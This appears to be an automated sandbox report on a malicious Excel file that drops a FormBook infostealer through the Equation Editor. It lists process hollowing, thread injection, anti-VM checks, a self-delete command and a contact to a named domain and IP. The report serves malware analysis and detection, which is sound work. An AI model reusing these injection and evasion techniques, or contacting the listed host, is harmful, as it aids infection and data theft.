Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D0DBDA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C7FBD7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D2CBA4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CA7B00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00D1FDDD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C8CD5B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00CB0D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C9EE4C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C90F3F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009B893
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009B896
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009C963
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009D1E5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00088C70
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00082D87
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00082D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00082FB0

Source: C:\Users\Public\vbc.exe	Code function: String function: 0091DF5C appears 89 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00963F92 appears 73 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0091E2A8 appears 32 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0098F970 appears 71 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0096373B appears 185 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00C7E2A8 appears 38 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00CEF970 appears 77 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00CC3F92 appears 99 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00CC373B appears 237 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 00C7DF5C appears 101 times

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004185B0 NtCreateFile,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418660 NtReadFile,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004186E0 NtClose,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00418790 NtAllocateVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009100C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00910048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00910078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009107AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090F9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090F900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009110D0 NtOpenProcessToken,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00910060 NtQuerySection,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009101D4 NtSetValueKey,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0091010C NtOpenDirectoryObject,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00911148 NtOpenThread,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090F8CC NtWaitForSingleObject,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00911930 NtSetContextThread,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090F938 NtWriteFile,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FAB8 NtQueryValueKey,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FA20 NtQueryInformationFile,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FA50 NtEnumerateValueKey,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FBE8 NtQueryVirtualMemory,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FB50 NtCreateKey,
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0090FC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C700C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C707AC NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6F9F0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6F900 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FB50 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C710D0 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C70048 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C70060 NtQuerySection,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C70078 NtResumeThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C701D4 NtSetValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C71148 NtOpenThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C7010C NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6F8CC NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C71930 NtSetContextThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6F938 NtWriteFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FAD0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FAB8 NtQueryValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FA50 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FA20 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FBE8 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C70C40 NtGetContextThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FC48 NtSetInformationFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FC30 NtOpenProcess,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C71D80 NtSuspendThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FD5C NtEnumerateKey,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FEA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FE24 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C6FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_000985B0 NtCreateFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00098660 NtReadFile,
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_000986E0 NtClose,

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe 2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
Source: Joe Sandbox View	Dropped File: C:\Users\Public\vbc.exe 2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write

Source: Sajeeb09908976745344567.xlsx	Virustotal: Detection: 29%
Source: Sajeeb09908976745344567.xlsx	ReversingLabs: Detection: 21%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Sajeeb09908976745344567.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC30.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/15@2/2

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00402053 CoCreateInstance,MultiByteToWideChar,

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: netsh.pdb source: vbc.exe, 00000005.00000002.556406324.0000000000553000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, netsh.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\Public\vbc.exe

Unpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;

Source: C:\Users\Public\vbc.exe	Code function: 4_2_1000A505 push ecx; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B85C push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C932 pushfd ; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041525A pushfd ; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00416235 push 1D9B51BBh; retf
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00415C87 push cs; iretd
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0040AEB2 push ebp; retf
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B7F2 push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B7FB push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B7A5 push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C7DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009B85C push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009C932 pushfd ; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00096235 push 1D9B51BBh; retf
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009525A pushfd ; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00095C87 push cs; iretd
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0008AEB2 push ebp; retf
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009B7A5 push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009B7FB push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_0009B7F2 push eax; ret

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll	Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Users\Public\vbc.exe

Code function: 4_2_10008836 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2724	Thread sleep time: -300000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 2628	Thread sleep time: -30000s >= -30000s

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088C0 rdtsc

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405E93 FindFirstFileA,FindClose,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402671 FindFirstFileA,

Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.506645799.0000000008374000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.512518257.000000000457A000.00000004.00000001.sdmp	Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________'
Source: explorer.exe, 00000006.00000000.512518257.000000000457A000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.493761978.00000000005C4000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.521416523.00000000044E7000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0Co>
Source: explorer.exe, 00000006.00000000.508758981.000000000029B000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: vbc.exe, 00000004.00000002.493761978.00000000005C4000.00000004.00000020.sdmp	Binary or memory string: ^ECVMWar_VMware
Source: explorer.exe, 00000006.00000000.505152521.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\Public\vbc.exe

Code function: 4_2_1000CDB2 IsDebuggerPresent,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_100093F8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_100098C2 GetProcessHeap,

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088C0 rdtsc

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug

Source: C:\Users\Public\vbc.exe	Code function: 4_2_1001A402 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1001A616 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1001A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1001A706 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 4_2_1001A744 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe	Code function: 5_2_009226F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 8_2_00C826F8 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409B30 LdrLoadDll,

Source: C:\Users\Public\vbc.exe

Code function: 4_2_10009B60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe	Domain query: www.washingtonboatrentals.com

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1640000

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764
Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 1764

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'

Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

Code function: 4_2_100098DF cpuid

Source: C:\Users\Public\vbc.exe

Code function: 4_2_10012E10 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Source: C:\Users\Public\vbc.exe

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
